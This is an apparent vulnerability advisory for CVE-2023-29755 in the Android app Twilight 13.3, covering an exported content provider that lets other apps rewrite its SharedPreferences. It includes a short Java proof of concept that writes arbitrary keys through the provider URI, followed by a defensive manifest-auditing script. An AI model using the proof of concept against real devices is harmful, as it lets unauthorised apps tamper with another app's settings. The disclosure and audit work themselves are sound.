CVE-2023-29755: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Twilight v.13.3 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Escalation of Privileges exists in Twilight (CVE-2023-29755)

Vendor: Twilight (http://twilight.urbandroid.org/)

Affected product: Twilight (com.urbandroid.lux)

Version: 13.3

Download link: https://play.google.com/store/apps/details?id=com.urbandroid.lux

Description of the vulnerability for use in the CVE: An issue found in Twilight v.13.3 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Twilight application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality. Specifically, an attacker is able to change relevant settings in the application by modifying certain key data in the SharedPreference file, such as adjusting the screen brightness, changing the application theme, etc., resulting in an escalation of privilege attack.

PoC:

    ContentResolver contentResolver = getApplicationContext().getContentResolver();
    Uri parse = Uri.parse("content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE_AUTHORITY/a/a");
    ContentValues contentValues = new ContentValues();
    // attacker can update any data in sharedpreferences!
    contentValues.put(targetKey, targetValue);
    contentResolver.insert(parse, contentValues);
    System.out.println("输入数据");
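A defender-side check for the exposure described above, as an added example that is not from the advisory or from the Twilight code: it scans a decoded AndroidManifest.xml for content providers that other apps can write to. The sample manifest and every name in it are constructed, since the advisory does not show Twilight's manifest.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed sample manifest (decoded XML); package, authorities and class
# names are hypothetical and are not taken from the Twilight APK.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.app">
  <uses-sdk android:targetSdkVersion="33"/>
  <permission android:name="com.example.app.SIG" android:protectionLevel="signature"/>
  <permission android:name="com.example.app.WEAK" android:protectionLevel="normal"/>
  <application>
    <provider android:name=".OpenPrefs" android:exported="true"
              android:authorities="com.example.app.prefs.open"/>
    <provider android:name=".WeakPrefs" android:exported="true"
              android:authorities="com.example.app.prefs.weak"
              android:writePermission="com.example.app.WEAK"/>
    <provider android:name=".SignedPrefs" android:exported="true"
              android:authorities="com.example.app.prefs.signed"
              android:writePermission="com.example.app.SIG"/>
    <provider android:name=".PrivatePrefs" android:exported="false"
              android:authorities="com.example.app.prefs.private"/>
  </application>
</manifest>"""


def audit_providers(manifest_xml):
    """Return (authority, reason) for each provider other apps can write to."""
    root = ET.fromstring(manifest_xml)
    sdk = root.find("uses-sdk")
    target = int(sdk.get(ANDROID + "targetSdkVersion", "1")) if sdk is not None else 1
    # Protection level of every permission this manifest declares itself.
    levels = {p.get(ANDROID + "name"): p.get(ANDROID + "protectionLevel", "normal")
              for p in root.findall("permission")}
    findings = []
    for prov in root.iter("provider"):
        exported = prov.get(ANDROID + "exported")
        # With no explicit attribute, providers are exported only for targetSdk <= 16.
        if exported == "false" or (exported is None and target >= 17):
            continue
        authority = prov.get(ANDROID + "authorities")
        # insert()/update()/delete() are gated by writePermission, else permission.
        perm = prov.get(ANDROID + "writePermission") or prov.get(ANDROID + "permission")
        if perm is None:
            findings.append((authority, "exported with no write permission"))
        elif "signature" not in levels.get(perm, "undeclared"):
            findings.append((authority, "write permission is not signature-level"))
    return findings
```

Calling `audit_providers(SAMPLE_MANIFEST)` reports the first two providers. A manifest with no `uses-sdk` element is treated conservatively, so a provider without an explicit `android:exported` attribute is reported as exported.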
